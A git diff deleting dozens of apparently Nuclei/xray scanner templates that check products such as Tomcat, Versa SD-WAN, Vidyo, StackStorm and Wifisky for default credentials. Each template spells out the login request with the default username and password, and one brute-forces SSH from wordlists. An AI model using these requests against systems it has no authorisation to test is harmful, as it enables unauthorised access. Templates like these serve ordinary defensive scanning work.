- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /users/login HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "spectracom"
- - "deleted"
- part: header
- condition: and
- - type: status
- status:
- - 302
diff --git a/tmp/default/spectracom-default-login.yaml b/tmp/default/spectracom-default-login.yaml
deleted file mode 100644
index 7d426c5e2e..0000000000
--- a/tmp/default/spectracom-default-login.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: spectracom-default-login
-
-info:
- name: Spectracom Default Login
- author: madrobot
- severity: medium
- tags: spectracom,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /users/login HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "spectracom"
- - "deleted"
- part: header
- condition: and
-
- - type: status
- status:
- - 302
diff --git a/tmp/default/spectracom-default-password.yaml b/tmp/default/spectracom-default-password.yaml
deleted file mode 100644
index 9304fa3de3..0000000000
--- a/tmp/default/spectracom-default-password.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: spectracom-default-password
-
-info:
- name: Spectracom Default Login
- author: madrobot
- severity: high
- verified: false
- description: fofa "Spectracom"
-
-rules:
- r0:
- request:
- method: POST
- path: /users/login
- body: data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123
- expression: response.status == 302 && response.raw_header.bcontains(b'spectracom') && response.raw_header.bcontains(b'deleted')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/ssh-default-logins.yaml b/tmp/default/ssh-default-logins.yaml
deleted file mode 100644
index be9a0ac69a..0000000000
--- a/tmp/default/ssh-default-logins.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: ssh-weak-credentials
-
-info:
- name: SSH - Default Logins
- author: tarunKoyalwar
- severity: critical
- metadata:
- max-request: 223
- shodan-query: port:1433
- tags: js,ssh,default-login,network,fuzz
-
-javascript:
- - pre-condition: |
- var m = require("nuclei/ssh");
- var c = m.SSHClient();
- var response = c.ConnectSSHInfoMode(Host, Port);
- // only bruteforce if ssh allows password based authentication
- response["UserAuth"].includes("password")
- code: |
- var m = require("nuclei/ssh");
- var c = m.SSHClient();
- c.Connect(Host,Port,Username,Password);
- args:
- Host: "{{Host}}"
- Port: "22"
- Username: "{{usernames}}"
- Password: "{{passwords}}"
- threads: 10
- attack: pitchfork
- payloads:
- usernames: helpers/wordlists/ssh-users.txt
- passwords: helpers/wordlists/ssh-passwords.txt
- stop-at-first-match: true
- matchers:
- - type: dsl
- dsl:
- - "response == true"
- - "success == true"
- condition: and
-# digest: 4a0a0047304502207c2e276750a40905f72d16d4247de8caaf90717e48247d4683f1fd0fb082966e022100bd4cffb2e9b52520acd1d43e36f98aec908d9363e724de3df2f74d5ce6d7840f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/tmp/default/stackstorm-default-login.yaml b/tmp/default/stackstorm-default-login.yaml
deleted file mode 100644
index 3c4c0d3ac7..0000000000
--- a/tmp/default/stackstorm-default-login.yaml
+++ /dev/null
@@ -1,47 +0,0 @@
-id: stackstorm-default-login
-
-info:
- name: StackStorm Default Login
- author: PaperPen
- severity: high
- description: A StackStorm default admin login was discovered.
- reference:
- - https://github.com/StackStorm/st2-docker
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 1
- fofa-query: app="stackstorm"
- tags: stackstorm,default-login
-
-http:
- - raw:
- - |
- POST /auth/tokens HTTP/1.1
- Host: {{BaseURL}}
- Content-Type: application/json
- Authorization: Basic {{base64(username + ':' + password)}}
-
- attack: pitchfork
- payloads:
- username:
- - st2admin
- password:
- - Ch@ngeMe
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"user":'
- - '"token":'
- - '"expiry":'
- condition: and
-
- - type: status
- status:
- - 201
-
-# digest: 490a00463044022074f8a1a3b527bda73b5d7ad5797e74b57dbd4dd2db3d619350188afaaedee15702202db68a2700ba707012e6f6deec8b4eff4cd9ab3e17f7bb1958eff0ddccfba917:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/szhe-default-login-10637.yaml b/tmp/default/szhe-default-login-10637.yaml
deleted file mode 100644
index cb2784fc65..0000000000
--- a/tmp/default/szhe-default-login-10637.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: szhe-default-login
-info:
- name: Szhe Default Login
- author: pikpikcu
- severity: low
- tags: szhe,default-login
- reference:
- - https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /login/ HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- email=springbird@qq.com&password=springbird&remeber=true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'You should be redirected automatically to target URL: /'
- - type: word
- words:
- - 'Set-Cookie: session'
- part: header
- - type: status
- status:
- - 302
diff --git a/tmp/default/szhe-default-login.yaml b/tmp/default/szhe-default-login.yaml
deleted file mode 100644
index f54e3a737f..0000000000
--- a/tmp/default/szhe-default-login.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-id: szhe-default-login
-
-info:
- name: Szhe Default Login
- author: pikpikcu
- severity: low
- tags: szhe,default-login
- reference:
- - https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /login/ HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- email=springbird@qq.com&password=springbird&remeber=true
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - 'You should be redirected automatically to target URL: /'
-
- - type: word
- words:
- - 'Set-Cookie: session'
- part: header
-
- - type: status
- status:
- - 302
diff --git a/tmp/default/szhe-default-password-10640.yaml b/tmp/default/szhe-default-password-10640.yaml
deleted file mode 100644
index 928e159f6c..0000000000
--- a/tmp/default/szhe-default-password-10640.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: szhe-default-password
-info:
- name: Szhe Default Password
- author: pikpikcu
- severity: low
- tags: szhe,default-login
-# vendor: https://github.com/Cl0udG0d/SZhe_Scan
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /login/ HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- email=springbird@qq.com&password=springbird&remeber=true
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'You should be redirected automatically to target URL: /'
- - type: word
- words:
- - 'Set-Cookie: session'
- part: header
- - type: status
- status:
- - 302
diff --git a/tmp/default/szhe-default-password.yaml b/tmp/default/szhe-default-password.yaml
deleted file mode 100644
index a366f4ef6b..0000000000
--- a/tmp/default/szhe-default-password.yaml
+++ /dev/null
@@ -1,37 +0,0 @@
-id: szhe-default-password
-
-info:
- name: Szhe Default Password
- author: pikpikcu
- severity: low
- tags: szhe,default-login
-# vendor: https://github.com/Cl0udG0d/SZhe_Scan
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /login/ HTTP/1.1
- Host: {{Subdomains}}
- Content-Type: application/x-www-form-urlencoded
-
- email=springbird@qq.com&password=springbird&remeber=true
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - 'You should be redirected automatically to target URL: /'
-
- - type: word
- words:
- - 'Set-Cookie: session'
- part: header
-
- - type: status
- status:
- - 302
diff --git a/tmp/default/telecom-gateway-default-login.yaml b/tmp/default/telecom-gateway-default-login.yaml
deleted file mode 100755
index 41d90f1728..0000000000
--- a/tmp/default/telecom-gateway-default-login.yaml
+++ /dev/null
@@ -1,39 +0,0 @@
-id: telecom-gateway-default-login
-info:
- name: Telecom Gateway Default Login
- author:
- - l0ne1y
- description: |-
- 电信网关配置管理系统弱口令
- 电信网关配置管理系统存在默认弱口令,导致攻击者可利用admin/admin用户密码进入后台,进而对系统以及数据安全造成威胁。
- severity: high
- remediation: |-
- #### 官方修复方案:
- 升级系统至无漏洞版本,或于官网下载安全补丁。
-requests:
-- matchers:
- - type: word
- condition: and
- part: body
- words:
- - 电信网关服务器管理后台
- - index-shang.php
- - di.php
- - type: status
- status:
- - 200
- matchers-condition: and
- raw:
- - |
- POST /manager/login.php HTTP/1.1
- Host: {{Hostname}}
-
- Name={{username}}&Pass={{password}}
- attack: pitchfork
- payloads:
- password:
- - admin
- username:
- - admin
- max-redirects: 2
- redirects: true
diff --git a/tmp/default/telecom-gateway-default-password.yaml b/tmp/default/telecom-gateway-default-password.yaml
deleted file mode 100644
index 33d6c1eb4f..0000000000
--- a/tmp/default/telecom-gateway-default-password.yaml
+++ /dev/null
@@ -1,17 +0,0 @@
-id: telecom-gateway-default-password
-
-info:
- name: Telecom Gateway Default Password
- author: B1anda0(https://github.com/B1anda0)
- severity: high
- verified: false
-
-rules:
- r0:
- request:
- method: POST
- path: /manager/login.php
- body: Name=admin&Pass=admin
- follow_redirects: true
- expression: response.status == 200 && response.body.bcontains(b"index-shang.php") && response.body.bcontains(b"di.php")
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/telecom-gateway-default-password.yml b/tmp/default/telecom-gateway-default-password.yml
deleted file mode 100644
index 1e6d2bfe81..0000000000
--- a/tmp/default/telecom-gateway-default-password.yml
+++ /dev/null
@@ -1,24 +0,0 @@
-name: poc-yaml-telecom-gateway-default-password
-manual: true
-transport: http
-rules:
- r0:
- request:
- cache: true
- method: GET
- path: /manager/index.php
- follow_redirects: false
- expression: response.status == 200
- r1:
- request:
- cache: true
- method: POST
- path: /manager/login.php
- body: Name=admin&Pass=admin
- follow_redirects: true
- expression: response.status == 200 && response.body.bcontains(b"电信网关服务器管理后台") && response.body.bcontains(b"index-shang.php") && response.body.bcontains(b"di.php")
-expression: r0() && r1()
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E7%94%B5%E4%BF%A1/%E7%94%B5%E4%BF%A1%E7%BD%91%E5%85%B3%E9%85%8D%E7%BD%AE%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
diff --git a/tmp/default/tomcat-default-login.yaml b/tmp/default/tomcat-default-login.yaml
deleted file mode 100644
index d2b92b06e4..0000000000
--- a/tmp/default/tomcat-default-login.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: tomcat-default-login
-
-info:
- name: Apahce Tomcat Manager Default Login
- author: pdteam
- severity: high
- verified: true
-
-
-set:
- adminb64: base64('admin:admin')
- tomcatb64: base64('tomcat:tomcat')
- admin123: base64('admin:123456')
-rules:
- r0:
- request:
- method: GET
- path: /manager/html
- headers:
- Authorization: "Basic {{adminb64}}"
- expression: response.status == 200 && response.headers["set-cookie"].contains('JSESSIONID') && response.body.bcontains(b"/manager")
- r1:
- request:
- method: GET
- path: /manager/html
- headers:
- Authorization: "Basic {{tomcatb64}}"
- expression: response.status == 200 && response.headers["set-cookie"].contains('JSESSIONID') && response.body.bcontains(b"/manager")
- r2:
- request:
- method: GET
- path: /manager/html
- headers:
- Authorization: "Basic {{admin123}}"
- expression: response.status == 200 && response.headers["set-cookie"].contains('JSESSIONID') && response.body.bcontains(b"/manager")
-expression: r0() || r1() || r2()
\ No newline at end of file
diff --git a/tmp/default/tomcat-default-manager.yaml b/tmp/default/tomcat-default-manager.yaml
deleted file mode 100644
index 64bb51daeb..0000000000
--- a/tmp/default/tomcat-default-manager.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-info:
- id: tomcat-default-manager
- name: Tomcat Default Manager - Detect
- author: OpenAI
- description: Template to detect Tomcat Default Manager
- severity: Medium
- classification:
- country: any
- tags:
- - tomcat
- - security
- - manager
-
- reference:
- - https://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html
-
- matcher-condition: or
-
- requests:
- method: GET
- path:
- - "/manager/html"
- description: Attempt to retrieve Tomcat Default Manager page
- condition: or
-
- matchers:
- - pattern: "Tomcat Web Application Manager"
- type: body
- description: Tomcat Default Manager page found in the response body
-
- response:
- - status:
- - 200
- description: Successful response status
diff --git a/tmp/default/tomcat-manager-default-creds.yaml b/tmp/default/tomcat-manager-default-creds.yaml
deleted file mode 100644
index bf5a5a6dad..0000000000
--- a/tmp/default/tomcat-manager-default-creds.yaml
+++ /dev/null
@@ -1,38 +0,0 @@
-info:
- id: tomcat-manager-default-creds
- name: Tomcat Manager Application Default Credentials - Detect
- author: OpenAI
- description: Template to detect Tomcat Manager Application instances with default credentials
- severity: Medium
- classification:
- country: any
- tags:
- - tomcat
- - security
- - authentication
- - default-credentials
-
- reference:
- - https://tomcat.apache.org/tomcat-9.0-doc/manager-howto.html
-
- matcher-condition: or
-
- requests:
- method: GET
- path:
- - "/manager/text/list"
- description: Attempt to access Tomcat Manager Application
- condition: or
-
- matchers:
- - pattern: "401 Unauthorized"
- type: body
- description: Tomcat Manager Application Unauthorized error message found in response body
- - pattern: "List of all applications"
- type: body
- description: Tomcat Manager Application list of applications found in response body
-
- response:
- - status:
- - 401
- description: Unauthorized response status
diff --git a/tmp/default/trilithic-viewpoint-default-10836.yaml b/tmp/default/trilithic-viewpoint-default-10836.yaml
deleted file mode 100644
index 2336b52e0d..0000000000
--- a/tmp/default/trilithic-viewpoint-default-10836.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: trilithic-viewpoint-default
-info:
- name: Trilithic Viewpoint Default Credentials
- author: davidmckennirey
- severity: high
- description: |
- Searches for default admin credentials for the (discontinued) Trilithic Viewpoint application.
- tags: default-login,trilithic,viewpoint
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1
- Host: {{Subdomains}}
- Content-Length: 65
- Content-Type: application/json
- Cookie: trilithic_win_auth=false
-
- {u:"admin", t:"undefined", p:"trilithic", d:"", r:false, w:false}
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - '"authorized":true'
- - 'redirectUrl'
- part: body
- condition: and
diff --git a/tmp/default/trilithic-viewpoint-default-password.yaml b/tmp/default/trilithic-viewpoint-default-password.yaml
deleted file mode 100644
index d981dfffdc..0000000000
--- a/tmp/default/trilithic-viewpoint-default-password.yaml
+++ /dev/null
@@ -1,21 +0,0 @@
-id: trilithic-viewpoint-default-password
-
-info:
- name: Trilithic Viewpoint Default Login
- author: davidmckennirey
- severity: high
- verified: false
-
-
-rules:
- r0:
- request:
- method: POST
- path: /ViewPoint/admin/Site/ViewPointLogin
- headers:
- Content-Type: application/json
- Cookie: trilithic_win_auth=false
- body: |
- {u:"admin", t:"undefined", p:"trilithic", d:"", r:false, w:false}
- expression: response.status == 200 && response.body.bcontains(b'"authorized":true') && response.body.bcontains(b'redirectUrl')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/trilithic-viewpoint-default.yaml b/tmp/default/trilithic-viewpoint-default.yaml
deleted file mode 100644
index ff5df5683a..0000000000
--- a/tmp/default/trilithic-viewpoint-default.yaml
+++ /dev/null
@@ -1,37 +0,0 @@
-id: trilithic-viewpoint-default
-
-info:
- name: Trilithic Viewpoint Default Credentials
- author: davidmckennirey
- severity: high
- description: |
- Searches for default admin credentials for the (discontinued) Trilithic Viewpoint application.
- tags: default-login,trilithic,viewpoint
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /ViewPoint/admin/Site/ViewPointLogin HTTP/1.1
- Host: {{Subdomains}}
- Content-Length: 65
- Content-Type: application/json
- Cookie: trilithic_win_auth=false
-
- {u:"admin", t:"undefined", p:"trilithic", d:"", r:false, w:false}
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - '"authorized":true'
- - 'redirectUrl'
- part: body
- condition: and
\ No newline at end of file
diff --git a/tmp/default/ucmdb-default-login-10870.yaml b/tmp/default/ucmdb-default-login-10870.yaml
deleted file mode 100644
index a77f71dddb..0000000000
--- a/tmp/default/ucmdb-default-login-10870.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: ucmdb-default-login
-info:
- name: Micro Focus UCMDB Default Login
- author: dwisiswant0
- severity: high
- tags: ucmdb,default-login
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1
- Host: {{Subdomains}}
-
- customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "LWSSO_COOKIE_KEY"
- part: header
diff --git a/tmp/default/ucmdb-default-login.yaml b/tmp/default/ucmdb-default-login.yaml
deleted file mode 100644
index 90c149cc23..0000000000
--- a/tmp/default/ucmdb-default-login.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: ucmdb-default-login
-
-info:
- name: Micro Focus UCMDB Default Login
- author: dwisiswant0
- severity: high
- tags: ucmdb,default-login
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1
- Host: {{Subdomains}}
-
- customerID=1&isEncoded=false&userName=diagnostics&password=YWRtaW4=&ldapServerName=UCMDB
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "LWSSO_COOKIE_KEY"
- part: header
diff --git a/tmp/default/utt-default-password.yaml b/tmp/default/utt-default-password.yaml
deleted file mode 100644
index 276e3389de..0000000000
--- a/tmp/default/utt-default-password.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: utt-default-password
-
-info:
- name: utt-default-password
- author: zan8in
- severity: high
- verified: true
- description: app="UTT-安全网络管理系统"
-
-rules:
- r0:
- request:
- method: POST
- path: /action/login
- body: username=admin&password=admin
- expression: response.status == 200 && response.body.bcontains(b"var time=0;") && response.body.bcontains(b"var leftPwdNums=0;")
-expression: r0()
-
diff --git a/tmp/default/versa-default-login.yaml b/tmp/default/versa-default-login.yaml
deleted file mode 100644
index 5c02c869b2..0000000000
--- a/tmp/default/versa-default-login.yaml
+++ /dev/null
@@ -1,53 +0,0 @@
-id: versa-default-login
-
-info:
- name: Versa Networks SD-WAN Application Default Login
- author: davidmckennirey
- severity: high
- description: Versa Networks SD-WAN application default admin credentials were discovered.
- reference:
- - https://versa-networks.com/products/sd-wan.php
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 2
- tags: default-login,versa,sdwan
-
-http:
- - raw:
- - |
- GET /versa/login.html HTTP/1.1
- Host: {{Hostname}}
- Accept-Encoding: gzip, deflate
- - |
- POST /versa/login HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
-
- username={{user}}&password={{pass}}&sso=systemRadio
-
- attack: pitchfork
- payloads:
- user:
- - Administrator
- pass:
- - versa123
-
- matchers-condition: and
- matchers:
- - type: dsl
- dsl:
- - 'status_code_2 == 302'
- - "contains(tolower(header_2), 'jsessionid')"
- - "contains(tolower(header_2), 'location: /versa/index.html')"
- condition: and
-
- - type: dsl
- dsl:
- - "contains(tolower(header_2), '/login?error=true')"
- - "contains(tolower(header_2), '/login?tokenmissingerror=true')"
- negative: true
-
-# digest: 4a0a0047304502201151a2811f7fa9cf424460e96e360bd688ded834b6e0de107bce9fa8acde9631022100c703c221458734a361b21a8cf8a7df830b49541da77ce8b7d04a57d22df72bc8:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/versa-default-password.yaml b/tmp/default/versa-default-password.yaml
deleted file mode 100644
index 23b181e8be..0000000000
--- a/tmp/default/versa-default-password.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: versa-default-password
-
-info:
- name: Versa Networks SD-WAN Application Default Login
- author: davidmckennirey
- severity: high
- verified: true
- description: fofa "Versa Networks"
-
-rules:
- r0:
- request:
- method: POST
- path: /versa/login
- body: username=Administrator&password=versa123&sso=systemRadio
- expression: |
- response.status == 302 && response.headers["location"].contains("/versa/app/index.html") && response.raw_header.bcontains(b'JSESSIONID=')
-expression: r0()
\ No newline at end of file
diff --git a/tmp/default/vidyo-default-login-11008.yaml b/tmp/default/vidyo-default-login-11008.yaml
deleted file mode 100644
index 2ef617437c..0000000000
--- a/tmp/default/vidyo-default-login-11008.yaml
+++ /dev/null
@@ -1,60 +0,0 @@
-id: vidyo-default-login
-info:
- name: Vidyo Default Login
- author: izn0u
- severity: medium
- description: Vidyo default credentials were discovered.
- reference:
- - https://support.vidyocloud.com/hc/en-us/articles/226265128
- tags: vidyo,default-login
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
- cvss-score: 5.8
- cve-id:
- cwe-id: CWE-522
-requests:
- - raw:
- - |
- GET /super/login.html?lang=en HTTP/1.1
- Host: {{Hostname}}
- Origin: {{BaseURL}}
- - |
- POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
- Origin: {{BaseURL}}
- Referer: {{RootURL}}/super/login.html?lang=en
- Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en
-
- username={{username}}&password={{password}}
- payloads:
- username:
- - super
- password:
- - password
- attack: pitchfork
- extractors:
- - type: regex
- name: csrf_tkn
- group: 1
- part: body
- internal: true
- regex:
- - 'csrf_tkn=([A-Za-z0-9.-]+)'
- - type: kval
- name: session
- internal: true
- part: header
- kval:
- - JSESSIONID
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - "/super/index.html"
- - type: status
- status:
- - 302
-
-# Enhanced by mp on 2022/03/11
diff --git a/tmp/default/vidyo-default-login.yaml b/tmp/default/vidyo-default-login.yaml
deleted file mode 100644
index c76ee2d2b4..0000000000
--- a/tmp/default/vidyo-default-login.yaml
+++ /dev/null
@@ -1,68 +0,0 @@
-id: vidyo-default-login
-
-info:
- name: Vidyo Default Login
- author: izn0u
- severity: medium
- description: Vidyo default credentials were discovered.
- reference:
- - https://support.vidyocloud.com/hc/en-us/articles/226265128
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
- cvss-score: 5.8
- cwe-id: CWE-522
- metadata:
- max-request: 2
- tags: vidyo,default-login
-
-http:
- - raw:
- - |
- GET /super/login.html?lang=en HTTP/1.1
- Host: {{Hostname}}
- Origin: {{BaseURL}}
- - |
- POST /super/super_security_check;jsessionid={{session}}?csrf_tkn={{csrf_tkn}} HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded
- Origin: {{BaseURL}}
- Referer: {{RootURL}}/super/login.html?lang=en
- Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en
-
- username={{username}}&password={{password}}
-
- payloads:
- username:
- - super
- password:
- - password
- attack: pitchfork
-
- extractors:
- - type: regex
- name: csrf_tkn
- group: 1
- part: body
- internal: true
- regex:
- - 'csrf_tkn=([A-Za-z0-9.-]+)'
-
- - type: kval
- name: session
- internal: true
- part: header
- kval:
- - JSESSIONID
-
- matchers-condition: and
- matchers:
- - type: word
- part: header
- words:
- - "/super/index.html"
-
- - type: status
- status:
- - 302
-
-# digest: 4b0a00483046022100a87abbeec44ca5253aa151753e9df8c94b0f580c846aca195709a16f69644aea0221009ca61ed75652efbba627abc77297de75643348c28366ff978ad4f739e7bfdd61:922c64590222798bb761d5b6d8e72950
diff --git a/tmp/default/visionhub-default-login-11028.yaml b/tmp/default/visionhub-default-login-11028.yaml
deleted file mode 100644
index 16ab0dcc2e..0000000000
--- a/tmp/default/visionhub-default-login-11028.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: visionhub-default-login
-info:
- name: VisionHub Default Login
- author: Techryptic (@Tech)
- severity: high
- description: Default Login of admin:admin on VisionHub application.
- tags: visionhub,default-login
- reference: https://www.qognify.com/products/visionhub/
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /VisionHubWebApi/api/Login HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic YWRtaW46YWRtaW4=
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Set-Cookie: admin"
- part: header
- - type: status
- status:
- - 200
diff --git a/tmp/default/visionhub-default-login.yaml b/tmp/default/visionhub-default-login.yaml
deleted file mode 100644
index 3a830aa01d..0000000000
--- a/tmp/default/visionhub-default-login.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: visionhub-default-login
-
-info:
- name: VisionHub Default Login
- author: Techryptic (@Tech)
- severity: high
- description: Default Login of admin:admin on VisionHub application.
- tags: visionhub,default-login
- reference: https://www.qognify.com/products/visionhub/
-
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
-
- raw:
- - |
- POST /VisionHubWebApi/api/Login HTTP/1.1
- Host: {{Subdomains}}
- Authorization: Basic YWRtaW46YWRtaW4=
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "Set-Cookie: admin"
- part: header
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/tmp/default/wayos-default-password.yaml b/tmp/default/wayos-default-password.yaml
deleted file mode 100644
index 1e7e2b23ce..0000000000
--- a/tmp/default/wayos-default-password.yaml
+++ /dev/null
@@ -1,19 +0,0 @@
-id: wayos-default-password
-
-info:
- name: wayos-default-password
- author: zan8in
- severity: high
- verified: true
- description: fofa "wayos"
-
-rules:
- r0:
- request:
- method: POST
- path: /login.cgi
- body: |
- user=root&password=admin&Submit=%E7%99%BB+%E9%99%86
- expression: response.status == 200 && response.body.bcontains(b"window.open('index.htm?_")
-expression: r0()
-
diff --git a/tmp/default/wifisky-default-login-11201.yaml b/tmp/default/wifisky-default-login-11201.yaml
deleted file mode 100644
index e76c673349..0000000000
--- a/tmp/default/wifisky-default-login-11201.yaml
+++ /dev/null
@@ -1,48 +0,0 @@
-id: wifisky-default-login
-info:
- name: Wifisky Default Login
- author: pikpikcu
- severity: high
- tags: default-login,wifisky
- description: Wifisky default admin credentials were discovered.
- reference:
- - https://securityforeveryone.com/tools/wifisky-default-password-scanner
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cve-id:
- cwe-id: CWE-522
-requests:
- - raw:
- - |
- POST /login.php?action=login&type=admin HTTP/1.1
- Host: {{Hostname}}
- Accept: */*
- X-Requested-With: XMLHttpRequest
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Connection: close
-
- username={{username}}&password={{password}}
- payloads:
- username:
- - admin
- password:
- - admin
- attack: pitchfork
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "text/html"
- part: header
- - type: word
- words:
- - '"success":"true"'
- - '"data":'
- part: body
- condition: and
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/13
diff --git a/tmp/default/wifisky-default-login-11203.yaml b/tmp/default/wifisky-default-login-11203.yaml
deleted file mode 100644
index 5f6fd3a0aa..0000000000
--- a/tmp/default/wifisky-default-login-11203.yaml
+++ /dev/null
@@ -1,36 +0,0 @@
-id: wifisky-default-login
-info:
- name: Wifisky Default Login
- author: pikpikcu
- severity: high
- tags: default-login,wifisky
-requests:
- - payloads:
- Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
- attack: sniper
- threads: 100
- raw:
- - |
- POST /login.php?action=login&type=admin HTTP/1.1
- Host: {{Subdomains}}
- Accept: */*
- X-Requested-With: XMLHttpRequest
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Connection: close
-
- username=admin&password=admin
- matchers-condition: and
- matchers:
- - type: word
- words:
- - "text/html"
- part: header
- - type: word
- words:
- - '"success":"true"'
- - '"data":'
- part: body
- condition: and
- - type: status
- status:
- - 200
diff --git a/tmp/default/wifisky-default-login.yaml b/tmp/default/wifisky-default-login.yaml
deleted file mode 100644
index b1f35a9bfa..0000000000
--- a/tmp/default/wifisky-default-login.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: wifisky-default-login
-
-info:
- name: Wifisky Default Login
- author: pikpikcu
- severity: high
- tags: default-login,wifisky
-
